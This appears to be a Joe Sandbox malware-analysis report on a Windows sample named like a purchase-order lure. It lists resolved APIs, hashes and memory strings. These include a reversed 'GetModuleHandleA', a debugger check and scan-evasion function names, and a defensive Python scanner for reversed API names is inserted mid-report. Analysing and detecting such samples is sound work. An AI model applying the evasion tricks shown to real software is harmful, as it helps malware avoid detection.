                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                                                                                                          • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02B1D29D
                                                                                                                                                                                                                            • Part of subcall function 02B1D268: GetProcAddress.KERNEL32(00000000), ref: 02B1D281
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                          • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                                                                                          • API String ID: 1646373207-1918263038
                                                                                                                                                                                                                          • Opcode ID: b443657c2734cd024e7598013f2844046adc9808b9b82cd93c0809a548f52abf
                                                                                                                                                                                                                          • Instruction ID: ab797fb8c09b08b16e4b5de84b03299ad6174d89a9e79b7915815f80c00cded5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b443657c2734cd024e7598013f2844046adc9808b9b82cd93c0809a548f52abf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C4180E3AA830A5B52086B6EB500427FBDED345B503E046DBF884CB384DD74FC518A6E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02B26EDE
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02B26EEF
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02B26EFF
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02B26F0F
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02B26F1F
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02B26F2F
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02B26F3F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
• String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
• API String ID: 667068680-2233174745
• Opcode ID: 8f5a95351153522a1582fba12d6dd480a43677f41fb71cb39ff725e988e19850
• Instruction ID: a25fb6b2bde3ef0bcc12d3f4fc15160cb17dd42138a1a575ed5fffbaa3f07075
• Opcode Fuzzy Hash: 8f5a95351153522a1582fba12d6dd480a43677f41fb71cb39ff725e988e19850
• Instruction Fuzzy Hash: E8F050F0A8A351BDBF00FB745CC18AA375DAF246443401CD6F91B56556FB75D8188F10
APIs
• MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02B128CE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: Message
• String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
• API String ID: 2030045667-32948583
• Opcode ID: 903978b729aacb5ddda16b82b3b9124eaf4e57fbd2b33411e07235d969c7761f
• Instruction ID: 5507c5600d56c3f15398d43084f1c377e7a5ebc66945d8ed52f2b813e81388f0
• Opcode Fuzzy Hash: 903978b729aacb5ddda16b82b3b9124eaf4e57fbd2b33411e07235d969c7761f
• Instruction Fuzzy Hash: 04A1D230A042B88BDF21AA2CCC84B99B7E5EF09350F9441F5ED49AB386CB7599C5CF51
Strings
• 7, xrefs: 02B126A1
• An unexpected memory leak has occurred. , xrefs: 02B12690
• The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B12849
• The unexpected small block leaks are:, xrefs: 02B12707
• , xrefs: 02B12814
• Unexpected Memory Leak, xrefs: 02B128C0
• bytes: , xrefs: 02B1275D
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID:
• String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
• API String ID: 0-2723507874
• Opcode ID: 99f57f3881e2a15a6eef4d32ec7501292bea8005034faeda27033fbad7b4e4fb
• Instruction ID: bae71f51e1f4e8534cbb57ed49cab5ffccd1a85b2b893d872a0a95acdb38912b
• Opcode Fuzzy Hash: 99f57f3881e2a15a6eef4d32ec7501292bea8005034faeda27033fbad7b4e4fb
• Instruction Fuzzy Hash: C571B130A042B88FDF21EA2CCC84BD9BAE5EF09744F9041E5D949EB285DB758AC5CF51
APIs
• GetThreadLocale.KERNEL32(00000000,02B1C08B,?,?,00000000,00000000), ref: 02B1BDF6
  • Part of subcall function 02B1A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: Locale$InfoThread
• String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
• API String ID: 4232894706-2493093252
• Opcode ID: b8227e90d2a097cfddd5d19b250c711e8ca5b5275bdc34d7432c15379972680e
• Instruction ID: d14148c337e30014d83076611864d3586be67db5fcd1728b496b6ca07752be80
• Opcode Fuzzy Hash: b8227e90d2a097cfddd5d19b250c711e8ca5b5275bdc34d7432c15379972680e
• Instruction Fuzzy Hash: EA612135B401489BDB00EBA4D894B9F7BBBDF88700FD098F6E1019B645DA39EA06DF51
APIs
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2B000
• GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02B2B017
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2B0AB
• IsBadReadPtr.KERNEL32(?,00000002), ref: 02B2B0B7
• IsBadReadPtr.KERNEL32(?,00000014), ref: 02B2B0CB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: Read$HandleModule
• String ID: KernelBase$LoadLibraryExA
• API String ID: 2226866862-113032527
• Opcode ID: 5879f9bec06d05b45b446c89e24d0ebea646dde06d61af14613575026d47e791
• Instruction ID: f155cd0650f8b316ac0a53285981359ab5518f0d306c32bfe56e2cbf3bc9e26f
• Opcode Fuzzy Hash: 5879f9bec06d05b45b446c89e24d0ebea646dde06d61af14613575026d47e791
• Instruction Fuzzy Hash: 60317671A40315BBDB21DB68CC85F9E77A8FF05358F044691FA68D72C1DB34A948CBA4
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?,02B967C8,?,?,02B3E7A8,02B165B1,02B3D30D), ref: 02B14395
                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?,02B967C8,?,?,02B3E7A8,02B165B1,02B3D30D), ref: 02B1439B
                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,02B143E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?,02B967C8), ref: 02B143B0
                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,02B143E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?), ref: 02B143B6
                                                                                                                                                                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02B143D4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileHandleWrite$Message
                                                                                                                                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                                                          • API String ID: 1570097196-2970929446
APIs
  • Part of subcall function 02B1AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B1AD59
  • Part of subcall function 02B1AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B1AD7D
  • Part of subcall function 02B1AD3C: GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B1AD98
  • Part of subcall function 02B1AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B1AE2E
• CharToOemA.USER32(?,?), ref: 02B1AEFB
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF18
• WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF1E
• GetStdHandle.KERNEL32(000000F4,02B1AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF33
• WriteFile.KERNEL32(00000000,000000F4,02B1AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF39
• LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02B1AF5B
• MessageBoxA.USER32(00000000,?,?,00002010), ref: 02B1AF71
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
• String ID:
• API String ID: 185507032-0
APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B1E625
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B1E641
• SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02B1E67A
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B1E6F7
• SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02B1E710
• VariantCopy.OLEAUT32(?,00000000), ref: 02B1E745
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: ArraySafe$BoundIndex$CopyCreateVariant
• String ID:
• API String ID: 351091851-0
APIs
• RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B135BA
• RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B13609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B135ED
• RegCloseKey.ADVAPI32(?,02B13610,00000000,?,00000004,00000000,02B13609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B13603
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
• API String ID: 3677997916-4173385793
APIs
• GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
• GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
• GetProcAddress.KERNEL32(?,?), ref: 02B282D9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: Kernel32$sserddAcorPteG
• API String ID: 667068680-1372893251
APIs
• GetThreadLocale.KERNEL32(?,00000000,02B1AAE7,?,?,00000000), ref: 02B1AA68
  • Part of subcall function 02B1A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2
• GetThreadLocale.KERNEL32(00000000,00000004,00000000,02B1AAE7,?,?,00000000), ref: 02B1AA98
• EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02B1AAA3
• GetThreadLocale.KERNEL32(00000000,00000003,00000000,02B1AAE7,?,?,00000000), ref: 02B1AAC1
• EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02B1AACC
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4102113445-0
                                                                                                                                                                                                                          • Opcode ID: c25de21866a3faed2c5c329f67eb67aaee1271a9e5c2862483b33f87f09f3b7c
                                                                                                                                                                                                                          • Instruction ID: 4600b78ba860fbead209e29b526e038162604ca901d989cbafc064485c8b12db
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c25de21866a3faed2c5c329f67eb67aaee1271a9e5c2862483b33f87f09f3b7c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5201F2B16116446FF612BA64CD11BAF776DDB81710FD101F0F510E66D8DA75AE00CA64
APIs
• GetThreadLocale.KERNEL32(?,00000000,02B1ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02B1AB2F
  • Part of subcall function 02B1A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: Locale$InfoThread
• String ID: eeee$ggg$yyyy
• API String ID: 4232894706-1253427255
• Opcode ID: f45b332ebce2660b73673d088c6c997b01d70f6097ee09a4abaa24bf8f3c7acd
• Instruction ID: ee8bb3042f577d2e0c7255a6f09aca5ea51ad736c6efaadc0f55119a3c858ffe
• Opcode Fuzzy Hash: f45b332ebce2660b73673d088c6c997b01d70f6097ee09a4abaa24bf8f3c7acd
• Instruction Fuzzy Hash: F6419DB17055484BDB11EBB888906BFB3FBEF96300BE445E6D452C3394EB24F905CA65
APIs
• GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
  • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
• GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: HandleModule$AddressProc
• String ID: AeldnaHeludoMteG$KernelBASE
• API String ID: 1883125708-1952140341
• Opcode ID: 779f5c99506f10f5272cd8195748eb5907a2bb9cf168b3c7e574ffa04f13ef2e
• Instruction ID: bf39e8ac72baaec92e9f5b566a9fd28435be79624ed916c4835548d209982002
• Opcode Fuzzy Hash: 779f5c99506f10f5272cd8195748eb5907a2bb9cf168b3c7e574ffa04f13ef2e
• Instruction Fuzzy Hash: C4F096B1A54704AFEB00EFB4DD01959F7FDE749740B9188E0F804D3620DA34AE149D35
APIs
• GetModuleHandleW.KERNEL32(KernelBase,?,02B2FAEB,UacInitialize,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,Initialize), ref: 02B2F6EE
• GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B2F700
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: IsDebuggerPresent$KernelBase
• API String ID: 1646373207-2367923768
• Opcode ID: 6d0901c5a851615e28527e4beb28a8740ac354744e030dbbeda5711b60cfb90b
• Instruction ID: b5e4208da862008e53740efd043c4439ae8ff575a47f249ff175a983b3f320e3
• Opcode Fuzzy Hash: 6d0901c5a851615e28527e4beb28a8740ac354744e030dbbeda5711b60cfb90b
• Instruction Fuzzy Hash: 4AD012B17513601DBE0076F41CC482A239C875452D3300EE0B02AC64B2E5A6881D5114
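The two function entries above resolve imports at run time: one calls GetProcAddress next to the string "AeldnaHeludoMteG", which is "GetModuleHandleA" written backwards, and the other resolves "IsDebuggerPresent" from KernelBase by its plain name. A reversed import name defeats a naive strings-based triage or a YARA rule that only matches the forward form. The scanner below is an added example, not code from the Joe Sandbox report or from the sample: it takes a watch-list of API names (the names on this page plus a few common injection APIs, chosen here as an assumption) and reports each occurrence in forward or reversed form, in ASCII or UTF-16LE. The sample buffer is constructed to imitate the strings the report lists, with one extra reversed UTF-16LE name added to exercise the wide path.

```python
"""Scan a memory-dump buffer for Win32 API names stored plain or reversed.

Added example, not part of the Joe Sandbox report. The watch-list and the
sample buffer are assumptions constructed for illustration.
"""
import re

# Watch-list: names seen on this page plus a few common injection APIs.
# The extra names are an assumption for illustration, not from the report.
WATCHED_APIS = [
    "GetModuleHandleA", "GetModuleHandleW", "GetProcAddress",
    "IsDebuggerPresent", "CheckRemoteDebuggerPresent", "GetDiskFreeSpaceExA",
    "VirtualAllocEx", "WriteProcessMemory", "NtUnmapViewOfSection",
]


def encodings(name):
    """Yield (needle_bytes, label) for the four storage forms of one API name."""
    rev = name[::-1]
    yield name.encode("ascii"), "ascii"
    yield rev.encode("ascii"), "reversed-ascii"
    yield name.encode("utf-16-le"), "utf16le"
    yield rev.encode("utf-16-le"), "reversed-utf16le"


def scan(buf, apis=WATCHED_APIS):
    """Return every hit as {api, encoding, offset, matched}, sorted by offset."""
    hits = []
    for name in apis:
        for needle, label in encodings(name):
            for m in re.finditer(re.escape(needle), buf):
                hits.append({"api": name, "encoding": label,
                             "offset": m.start(), "matched": needle})
    hits.sort(key=lambda h: h["offset"])
    return hits


def suspicious(hits):
    """Keep only obfuscated forms: forward names are normal in any import table."""
    return [h for h in hits if h["encoding"].startswith("reversed")]


# Constructed sample (not real dump content): NUL-separated strings in the
# order the report lists them, plus one reversed UTF-16LE "WriteProcessMemory".
SAMPLE = (b"\x00KernelBASE\x00AeldnaHeludoMteG\x00ntdll\x00"
          b"KernelBase\x00IsDebuggerPresent\x00"
          b"kernel32.dll\x00GetDiskFreeSpaceExA\x00"
          + "yromeMssecorPetirW".encode("utf-16-le") + b"\x00\x00")

if __name__ == "__main__":
    for h in scan(SAMPLE):
        print(f"{h['offset']:#06x} {h['encoding']:<18} {h['api']}")
    print("obfuscated:", sorted(h["api"] for h in suspicious(SAMPLE and scan(SAMPLE))))
```

Run it against a raw dump (`scan(open(path, "rb").read())`) and triage the `suspicious()` subset first; forward names are expected in any PE's import directory, so the reversed hits are what distinguish a string-obfuscating loader from ordinary code. Note that a Delphi binary, which this sample appears to be from its locale and SafeArray runtime calls, also resolves some APIs by name legitimately, so a forward "GetDiskFreeSpaceExA" hit on its own is not evidence of anything.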
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,02B3D10B,00000000,02B3D11E), ref: 02B1C47A
• GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02B1C48B
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: AddressHandleModuleProc
